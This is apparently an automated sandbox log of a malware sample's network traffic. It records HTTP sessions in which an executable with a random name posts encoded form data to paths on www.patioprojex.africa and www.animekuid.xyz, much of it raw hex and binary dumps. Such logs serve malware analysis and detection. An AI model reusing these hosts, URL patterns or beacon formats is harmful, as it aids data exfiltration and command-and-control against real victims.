                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.patioprojex.africa
                                                                                                                    Origin: http://www.patioprojex.africa
                                                                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 58 61 75 4f 45 45 4a 35 49 4c 45 33 34 39 4b 62 72 68 69 7a 33 57 6e 67 42 69 43 35 4a 79 75 37 39 39 50 6f 48 34 69 54 43 2b 57 2b 33 51 61 36 79 6f 73 57 42 52 53 6e 51 4c 31 50 42 73 6a 38 58 58 56 71 6b 53 34 67 54 35 35 61 61 76 37 4e 42 58 71 70 49 7a 68 67 5a 6a 36 36 4f 36 64 55 31 64 7a 58 50 32 45 4e 2b 55 59 32 2b 46 6d 6e 4b 70 34 58 77 6c 68 75 2b 77 6b 73 7a 52 74 59 36 72 6f 33 64 5a 70 59 32 77 47 30 52 4c 76 48 68 7a 34 6b 37 42 61 61 72 73 54 73 71 72 5a 31 53 4f 52 4b 47 35 41 58 43 35 53 79 49 43 65 6a 61 56 2f 4b 63 78 77 77 37 4a 33 75 49 73 37 44 51 6d 66 55 36 6d 34 3d
                                                                                                                    Data Ascii: FbuX5DnP=XauOEEJ5ILE349Kbrhiz3WngBiC5Jyu799PoH4iTC+W+3Qa6yosWBRSnQL1PBsj8XXVqkS4gT55aav7NBXqpIzhgZj66O6dU1dzXP2EN+UY2+FmnKp4Xwlhu+wkszRtY6ro3dZpY2wG0RLvHhz4k7BaarsTsqrZ1SORKG5AXC5SyICejaV/Kcxww7J3uIs7DQmfU6m4=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.549722197.189.237.186804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:46.000499964 CEST769OUTPOST /iv79/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.patioprojex.africa
                                                                                                                    Origin: http://www.patioprojex.africa
                                                                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 58 61 75 4f 45 45 4a 35 49 4c 45 33 35 5a 32 62 70 41 69 7a 77 32 6e 2f 4f 43 43 35 44 53 75 33 39 39 4c 6f 48 37 75 44 44 4d 79 2b 33 77 71 36 31 64 4d 57 47 52 53 6e 45 62 31 4f 4c 4d 6a 7a 58 58 59 5a 6b 58 51 67 54 35 39 61 61 72 33 4e 41 68 69 75 4f 6a 68 2b 54 7a 36 34 42 61 64 55 31 64 7a 58 50 32 52 57 2b 55 77 32 69 6b 57 6e 4c 4d 4d 55 73 31 68 74 35 77 6b 73 33 52 74 63 36 72 6f 52 64 63 41 31 32 7a 2b 30 52 4b 66 48 6c 79 34 6e 69 52 62 54 31 63 53 4a 72 75 41 73 49 50 64 6e 47 62 49 55 43 37 65 58 45 55 7a 4a 41 33 33 69 50 52 63 49 72 61 2f 5a 5a 63 61 71 4b 46 50 6b 6b 78 74 6c 36 31 42 7a 52 6a 72 58 35 54 58 32 31 64 46 55 2b 73 65 54
                                                                                                                    Data Ascii: FbuX5DnP=XauOEEJ5ILE35Z2bpAizw2n/OCC5DSu399LoH7uDDMy+3wq61dMWGRSnEb1OLMjzXXYZkXQgT59aar3NAhiuOjh+Tz64BadU1dzXP2RW+Uw2ikWnLMMUs1ht5wks3Rtc6roRdcA12z+0RKfHly4niRbT1cSJruAsIPdnGbIUC7eXEUzJA33iPRcIra/ZZcaqKFPkkxtl61BzRjrX5TX21dFU+seT


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.549723197.189.237.186804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:48.548779964 CEST1786OUTPOST /iv79/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.patioprojex.africa
                                                                                                                    Origin: http://www.patioprojex.africa
                                                                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 58 61 75 4f 45 45 4a 35 49 4c 45 33 35 5a 32 62 70 41 69 7a 77 32 6e 2f 4f 43 43 35 44 53 75 33 39 39 4c 6f 48 37 75 44 44 4d 36 2b 32 44 53 36 32 37 45 57 48 52 53 6e 62 72 31 4c 4c 4d 6a 71 58 58 77 56 6b 58 55 76 54 37 31 61 62 4f 72 4e 48 54 4b 75 48 6a 68 2b 64 6a 36 31 4f 36 63 57 31 64 69 65 50 32 42 57 2b 55 77 32 69 6d 4f 6e 4d 5a 34 55 75 31 68 75 2b 77 6b 67 7a 52 74 34 36 6f 5a 6b 64 63 4d 44 6a 53 65 30 53 71 50 48 6a 51 51 6e 71 52 62 52 30 63 53 72 72 75 45 4a 49 50 42 64 47 61 4e 2f 43 34 2b 58 47 31 32 2f 54 79 58 4f 62 41 34 51 6b 35 76 31 5a 59 47 64 4a 58 48 51 35 54 35 36 31 57 49 61 47 6d 48 49 74 77 75 44 30 4d 51 62 2f 4c 50 76 62 47 77 65 4f 31 41 4d 42 75 54 4c 2f 62 32 78 57 56 53 35 33 51 39 42 79 4a 69 64 68 49 67 74 53 75 46 42 33 4e 5a 41 2f 6e 38 74 4f 59 73 64 79 61 55 4e 64 2b 45 31 31 6e 68 2b 62 65 6f 75 54 35 59 58 38 4d 57 76 77 76 76 34 66 77 41 78 63 41 71 76 66 73 4d 32 31 63 4e 48 77 36 57 31 68 4c 58 53 75 4f 47 4b 4a 78 50 39 78 [TRUNCATED]
                                                                                                                    Data Ascii: FbuX5DnP=XauOEEJ5ILE35Z2bpAizw2n/OCC5DSu399LoH7uDDM6+2DS627EWHRSnbr1LLMjqXXwVkXUvT71abOrNHTKuHjh+dj61O6cW1dieP2BW+Uw2imOnMZ4Uu1hu+wkgzRt46oZkdcMDjSe0SqPHjQQnqRbR0cSrruEJIPBdGaN/C4+XG12/TyXObA4Qk5v1ZYGdJXHQ5T561WIaGmHItwuD0MQb/LPvbGweO1AMBuTL/b2xWVS53Q9ByJidhIgtSuFB3NZA/n8tOYsdyaUNd+E11nh+beouT5YX8MWvwvv4fwAxcAqvfsM21cNHw6W1hLXSuOGKJxP9xIoEdCyeSxqpFqBaoVR6nvpcXfliBTirsUoXLk4j/za+TuqsEWtmuG9zsXZh1YfOdM+umvRYe4fs3mh3vOJ1wsG/RZUjDY6RKjXPvoqbhwCf6Ek7K509IDpVD1rAb8PBPTIRqHZsaJT3d0109lQ6DoSbwp47VaC8pnrrFxhKE6xxHSWu7mNGkyvGjrcUt4ESWTfC77KhnU0udm4O/p44mOHrHG9b4mFKSTeOWrAY9i0CzeDyQT+I1rmwqY67R70esieavq/pNvw5XhyqelX9iWje88rySGG43BdRm9u0H9FiM5i6/OkSxuc7L/pJz05l6aFDLowoduxuNcKhJre8dTbooh+LThicdOMdef8dpXEjGioGYTNBDm7tP5JkR318Yiq9KcJU6xqtwI64ba9/wJwiuwx3A5h8RdcyWt0ieArrel8INJTjcMuFgiPJCUSTF3D919B5wON7xYjpxVITUDbrgz2bAUUSNY06XCpinC5/vKKe8UJNa3NMkL/xmo9qvu0uU/VPLEy5iGGJbaPjXqamkpydWn33Pi4rUc4BdAKmYugv12NfhlxQimymMY46iQsRDf/0Y3ZYaXSy/z9eURkNET8BzsrNULUr/zZCWnLIrFWXM06LVIXQiHV/ipU3g4coziiFosyc36fa5AQiCvNw+pTwjfhqPDn [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.549724197.189.237.186804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:51.090662956 CEST479OUTGET /iv79/?FbuX5DnP=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.patioprojex.africa
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:57:52.647377968 CEST509INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:51 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Powered-By: PHP/8.2.23
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://patioprojex.africa/iv79/?FbuX5DnP=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&2Zv0=qtmpl4wh
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.549725203.175.9.128804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:57:59.769814968 CEST734OUTPOST /7u36/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.animekuid.xyz
                                                                                                                    Origin: http://www.animekuid.xyz
                                                                                                                    Referer: http://www.animekuid.xyz/7u36/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 63 54 49 55 57 68 31 65 6d 46 64 38 58 79 4d 33 61 39 30 52 2b 36 37 46 64 44 65 45 41 31 4f 46 33 74 48 4f 61 31 71 58 4e 56 79 45 53 6e 66 61 45 37 6d 6a 66 4d 31 32 48 62 78 42 73 77 39 30 37 41 76 4c 6d 53 2f 34 50 63 67 50 75 63 51 37 61 53 34 35 44 46 70 63 6d 68 7a 4d 79 6b 66 74 4b 53 35 61 45 52 58 33 68 6b 42 2b 6e 4a 49 50 41 53 38 2f 47 54 7a 76 2f 78 32 42 59 57 4c 49 73 35 65 45 51 38 4f 64 46 6c 51 50 6e 50 49 62 42 78 49 53 4a 63 37 48 76 44 2b 4c 79 71 43 34 30 62 6a 55 61 69 61 35 4b 79 42 38 7a 68 76 76 73 31 47 6a 66 63 6e 4e 70 71 44 47 48 2b 7a 74 63 4c 44 54 70 48 34 3d
                                                                                                                    Data Ascii: FbuX5DnP=cTIUWh1emFd8XyM3a90R+67FdDeEA1OF3tHOa1qXNVyESnfaE7mjfM12HbxBsw907AvLmS/4PcgPucQ7aS45DFpcmhzMykftKS5aERX3hkB+nJIPAS8/GTzv/x2BYWLIs5eEQ8OdFlQPnPIbBxISJc7HvD+LyqC40bjUaia5KyB8zhvvs1GjfcnNpqDGH+ztcLDTpH4=
                                                                                                                    Sep 30, 2024 19:58:01.228718996 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:00 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <https://animekuid.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: br
                                                                                                                    Content-Length: 9101
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 13 c4 bc 14 91 98 0f 80 8a c0 b8 89 8f 75 9e ef 3f 35 f5 ff eb 78 e6 16 fd 31 32 4f 26 5f 00 10 1b 57 99 ca b6 df c5 8e ef 66 7b 34 20 09 4a 8c b9 0d 01 59 54 14 55 fd 6f 7f d3 be bf 7c 53 b5 33 c0 08 87 d4 a9 b3 9b da 95 e2 29 76 0e b1 28 53 7e ef ed ae e6 87 bb f1 bf 3b 60 e6 c0 03 67 0e 04 e9 01 e3 00 a4 c6 03 2a bc 7d bb 7f ff dd e1 40 66 05 90 92 15 03 14 23 e4 10 42 e7 71 d3 a7 d8 16 10 d0 50 73 a5 4a c7 d2 8f d1 6c db 67 29 16 82 84 97 ef ef c5 e5 cb 89 cf 7b 85 4f 8c 08 ac 13 5f 8e f4 fb e7 c4 95 90 88 b8 ca eb 78 0c d5 de b7 e4 23 a2 20 d8 90 f5 21 53 d1 bd af 69 1b 03 e2 0b 27 d4 f9 28 01 d6 f9 15 6c 74 5d 7b f8 aa 17 c9 91 e9 c9 cd 35 3a 93 3e bd 77 b8 e9 bf 9c 01 00 5c ae d0 91 c2 30 5f cb 51 37 db f1 84 7d 4d 36 6d a8 62 b4 43 8a 8e bc 12 75 0c 4d a7 ae 8e 72 6c ab fc e0 a6 ea 0b b8 d9 0a fd e0 00 17 11 10 e6 6f c6 f9 12 5e f6 4d 67 3e ef 3e be d9 9b d9 3d 3f bb 6c 9b fe 01 e6 3f 80 dd 77 ab 87 de 59 4a 9a e3 7a 6c 6c 87 01 ee 93 e7 c8 fa 8b f2 af da 99 a9 d1 ed b3 8f e5 d0 5b 54 03 59 [TRUNCATED]
                                                                                                                    Data Ascii: u?5x12O&_Wf{4 JYTUo|S3)v(S~;`g*}@f#BqPsJlg){O_x# !Si'(lt]{5:>w\0_Q7}M6mbCuMrlo^Mg>>=?l?wYJzll[TY&"09N(c}jKk4i7[B2T-Cce2elA47^d!N rNI;Rb/A9V8qo9qX(0OR,TrMWCQx\++Z5 X8KDXD)yC<9FEjQFVsfn\!yx$\,pyHTA)L=RvW#H_H{8qy=52q6F]@0d{.__7>o].k*:~$1Vg:RyHt89iLuU@V]Cb1:adf2$#s>n74{Q9vIUxo#i]<@LRE;?)hD:gw
                                                                                                                    Sep 30, 2024 19:58:01.228744984 CEST124INData Raw: f6 8d 43 63 61 ed c0 94 68 5c 99 a9 70 59 39 5f 97 6e 93 d7 e0 5e 71 b8 c0 80 2d 36 cb b8 93 a0 f4 cc a8 9b 0e f1 4d 97 1f c5 ec 25 be 19 eb 6c 66 b0 52 56 c9 54 1f 75 22 8f 3f ff ce fc 56 7b fe 69 69 8d b5 cd d0 5f bb 61 d2 1b 43 ad 71 1f 9d e9
                                                                                                                    Data Ascii: Ccah\pY9_n^q-6M%lfRVTu"?V{ii_aCqCUal|iT1zUCUcaCK
                                                                                                                    Sep 30, 2024 19:58:01.228970051 CEST1236INData Raw: 3f 6a 4b 85 ae 09 52 3b a1 fb 21 7c 6c 68 dd b4 ed 37 33 3b cf 61 86 99 ae 97 b9 bc a6 df f8 a6 e9 9d 14 2f a7 49 1f 3c 43 37 c6 a9 33 37 f8 8d 76 3a fb 98 ae 27 7b 57 f9 78 ca bd 7a ad ee 4f 08 5c 23 a3 b5 55 1d 55 cf ec 95 ec c6 0c 76 5a e4 6f
                                                                                                                    Data Ascii: ?jKR;!|lh73;a/I<C737v:'{WxzO\#UUvZo&|$Z5s /vU"]UnWVcND:sg}Rh/okBQLnqk*<z95z6"*xuKu50
                                                                                                                    Sep 30, 2024 19:58:01.228981972 CEST1236INData Raw: 5e 36 ef 6c a6 a6 02 c8 dd f7 7d 66 5f 4d df 0e f8 f5 d0 db a1 d5 16 77 43 af cb e1 d7 78 70 0d 97 97 f4 71 6d 34 31 5d b9 ff 9f a6 2b 4c 85 a7 5c 25 b8 ae 98 4c be 62 7c dd 12 0f 79 4a f2 2a ae a2 39 b2 35 b5 43 5f a7 6e 06 ab 2a 7a 36 4e 04 40
                                                                                                                    Data Ascii: ^6l}f_MwCxpqm41]+L\%Lb|yJ*95C_n*z6N@Zr\CxOQ4f4]cQ<qXqG^t]:4"4](I6A6WMki"ZXi"pnBFXV[B[jv@L v5T|
                                                                                                                    Sep 30, 2024 19:58:01.228992939 CEST248INData Raw: 26 0e dd af 77 06 32 ba 95 e7 f3 39 2b 01 f3 94 30 79 f0 07 45 04 cb 80 51 a5 26 d3 ad b6 5a 9e d7 28 1e 54 bd f2 cb aa f0 48 69 78 1e 8c 8e 5b 50 71 1c 8c df 5f 49 65 32 98 bc af 90 b2 08 fb e2 35 42 7e 99 97 e9 ba cd 20 1a e7 8f 83 29 6a f1 26
                                                                                                                    Data Ascii: &w29+0yEQ&Z(THix[Pq_Ie25B~ )j&p;*|\`kRdLEwDl>^Y95V_NnH?nXP`v[+*G,9|b,c3V}?LaYcb112`R,;'Cy(LN=
                                                                                                                    Sep 30, 2024 19:58:01.229285002 CEST1236INData Raw: 74 1e 01 6c e9 66 d4 ed 81 47 03 ea 50 f4 1c 58 07 1a ca c3 e8 85 fa b8 6a 54 7c 2b f0 a8 27 af 3c 59 23 9d 0e df 2e 46 7c c4 8e 4d 08 96 22 a9 8b 3b 0e 84 42 ec 71 7d 17 1f 33 50 0a c1 cb d0 b8 f8 99 9e 63 88 60 f6 ae e0 d1 3d 0d c0 db 4d 9f 13
                                                                                                                    Data Ascii: tlfGPXjT|+'<Y#.F|M";Bq}3Pc`=MzoH_z.J-DwNpW"sR'#95GaIa(LaF#ZOW3N+8za4]p+xzHy\h![hZhYXp
                                                                                                                    Sep 30, 2024 19:58:01.229298115 CEST1236INData Raw: 27 b8 03 9c 38 29 ff 28 78 b2 6a c0 c5 0f e3 52 ad 0f 92 60 b4 80 71 b3 82 08 6a 4c 44 31 62 cf 6e 22 09 74 6d c4 60 8b f6 9c 48 86 41 64 33 05 1c 36 d0 1d 82 fc 6d 4c 49 84 82 07 f5 c3 9c 21 a0 58 b2 a1 dd 64 ec 3e 74 57 35 1c e7 24 e5 a9 d5 86
                                                                                                                    Data Ascii: '8)(xjR`qjLD1bn"tm`HAd36mLI!Xd>tW5$g+5FD9n;G~CD4*sOTn!sx`@8H;zvE75`|zM{Rcke4r[FR004Be0ND0^j
                                                                                                                    Sep 30, 2024 19:58:01.229307890 CEST248INData Raw: 92 16 cf 9e ad 64 26 90 26 aa 6d fd fa 2e 65 18 bd 05 c2 40 55 06 72 8f dd 7d 8d 50 6a f5 f6 8e f2 94 da 41 2d cf b0 d5 35 bd f7 7d 52 f8 3e df 35 27 d3 f9 0a 08 80 92 ba 88 32 03 20 a7 01 5b 22 0c 8c c3 48 12 2e c3 b5 7a 0a bd 5c b4 d1 9c 27 eb
                                                                                                                    Data Ascii: d&&m.e@Ur}PjA-5}R>5'2 ["H.z\''yPnM/j0~d1`q;7*$46Q)NZWHo.M|(4`z\&b,+ b)jAe8aDH|3kt[^(=
                                                                                                                    Sep 30, 2024 19:58:01.229717970 CEST1236INData Raw: ba 1a 26 a1 c3 bb 46 e8 a0 ca 34 86 0d 64 c3 b3 b8 1d 0b b7 c8 56 c0 9f d5 ce af 06 3e f6 00 b9 e4 11 1e 00 3d f7 e1 ee 80 f1 d9 cb 52 bb 1d bf cc a5 d0 cb b4 27 a2 fa ba 53 5f da 1d 59 c6 a7 13 39 4e e3 33 db f6 4c 82 73 28 50 2c 47 45 d6 34 eb
                                                                                                                    Data Ascii: &F4dV>=R'S_Y9N3Ls(P,GE4`K1F9h9sQB8*dmM{z3~i#S9@M'dbC(]v)|b|BNCtUiTv 8J=k=B2%_nx7dtTD
                                                                                                                    Sep 30, 2024 19:58:01.229803085 CEST1236INData Raw: b3 91 b2 47 f4 10 51 dc 19 c4 06 1c 13 12 8a 08 db 73 bd 88 69 db 66 b4 8d dd ab c4 cd ba da e7 74 ed 89 79 b3 05 16 2e 09 34 78 c7 03 b4 7a 39 22 aa 5e bd 60 6b 1b fa 44 95 22 76 b6 9b d6 50 e5 97 e3 2b 47 2a 51 4c 30 e3 01 5a bd fe 5e 39 d2 c7
                                                                                                                    Data Ascii: GQsifty.4xz9"^`kD"vP+G*QL0Z^9:5#uTC}IT$@/Nv+pZr[jlH)lH>6!CM:mVZnQcc>@,@0O.y=~N7VNmTKCG@8z6sGw <\uY
                                                                                                                    Sep 30, 2024 19:58:01.229929924 CEST219INData Raw: 20 d7 8f d7 f4 55 21 18 a7 96 2f 94 cf 40 4d 09 94 5e b6 1c 48 78 51 4a fb 34 df 98 d2 c1 f2 06 4a 54 4d 5d 89 08 ca 47 ec 21 c6 f6 94 46 ff ff ac 46 57 c1 77 1b e8 ca 16 87 2b 42 61 28 da f7 1f 3b 2f 35 19 77 05 89 18 17 8c 47 51 2a 42 a1 42 19
                                                                                                                    Data Ascii: U!/@M^HxQJ4JTM]G!FFWw+Ba(;/5wGQ*BBGr;/}/g8yQ'Z+p.IojHHIE:`n.GC@mLly4w<9g7nba[Kf{)V?J="


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.549726203.175.9.128804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:02.317236900 CEST754OUTPOST /7u36/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.animekuid.xyz
                                                                                                                    Origin: http://www.animekuid.xyz
                                                                                                                    Referer: http://www.animekuid.xyz/7u36/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 63 54 49 55 57 68 31 65 6d 46 64 38 46 43 63 33 63 65 63 52 34 61 37 47 59 44 65 45 50 56 4f 42 33 73 37 4f 61 33 47 48 4d 6e 6d 45 53 46 58 61 57 4a 4f 6a 59 4d 31 32 50 37 78 41 69 51 39 39 37 41 72 79 6d 54 44 34 50 63 30 50 75 64 67 37 61 69 45 34 46 56 70 65 39 52 7a 4f 39 45 66 74 4b 53 35 61 45 52 44 4e 68 6b 4a 2b 37 6f 34 50 41 7a 38 2b 46 54 7a 67 34 78 32 42 50 47 4c 4d 73 35 66 6e 51 2f 4c 32 46 6e 34 50 6e 4f 55 62 42 67 49 56 41 63 37 65 68 6a 2f 39 30 61 72 72 34 37 7a 46 51 77 61 36 66 41 35 30 79 58 43 46 32 58 4f 4c 4d 38 4c 31 35 35 4c 78 57 4f 53 45 47 6f 54 6a 33 51 74 79 2f 50 45 4f 4c 55 4a 35 4f 4a 56 6d 55 51 6f 6d 75 77 55 55
                                                                                                                    Data Ascii: FbuX5DnP=cTIUWh1emFd8FCc3cecR4a7GYDeEPVOB3s7Oa3GHMnmESFXaWJOjYM12P7xAiQ997ArymTD4Pc0Pudg7aiE4FVpe9RzO9EftKS5aERDNhkJ+7o4PAz8+FTzg4x2BPGLMs5fnQ/L2Fn4PnOUbBgIVAc7ehj/90arr47zFQwa6fA50yXCF2XOLM8L155LxWOSEGoTj3Qty/PEOLUJ5OJVmUQomuwUU


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.549727203.175.9.128804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:04.862169981 CEST1771OUTPOST /7u36/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.animekuid.xyz
                                                                                                                    Origin: http://www.animekuid.xyz
                                                                                                                    Referer: http://www.animekuid.xyz/7u36/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 63 54 49 55 57 68 31 65 6d 46 64 38 46 43 63 33 63 65 63 52 34 61 37 47 59 44 65 45 50 56 4f 42 33 73 37 4f 61 33 47 48 4d 6e 2b 45 53 51 44 61 48 65 36 6a 5a 4d 31 32 46 62 78 4e 69 51 38 76 37 45 47 36 6d 54 4f 50 50 65 4d 50 68 62 63 37 63 51 67 34 4c 56 70 65 31 78 7a 4e 79 6b 65 77 4b 53 70 57 45 52 54 4e 68 6b 4a 2b 37 71 67 50 47 69 38 2b 4a 7a 7a 76 2f 78 33 41 59 57 4b 54 73 35 48 5a 51 2b 2b 4e 46 33 59 50 6b 71 30 62 45 53 67 56 43 38 37 63 69 6a 2f 31 30 61 32 7a 34 37 76 4a 51 78 76 52 66 44 70 30 79 78 72 61 79 57 43 51 52 64 4c 51 32 35 50 69 45 71 47 69 59 37 4f 55 2b 68 5a 39 7a 73 73 32 47 52 56 39 59 34 56 74 44 6c 6f 62 2b 33 35 45 4e 76 73 4e 75 59 39 75 45 34 75 6e 6f 62 6f 68 46 4b 62 78 65 67 32 44 69 54 42 53 69 49 47 32 66 6d 39 46 4f 38 79 6b 42 50 33 6f 75 5a 34 64 76 48 79 57 6b 74 6f 57 4d 78 41 4d 64 35 61 48 50 4e 4c 42 4f 39 77 49 34 55 58 57 47 31 7a 2b 43 4e 53 71 4b 52 69 4c 6b 43 39 63 66 6b 65 71 52 36 72 64 51 6d 6f 71 35 6a 52 41 5a [TRUNCATED]
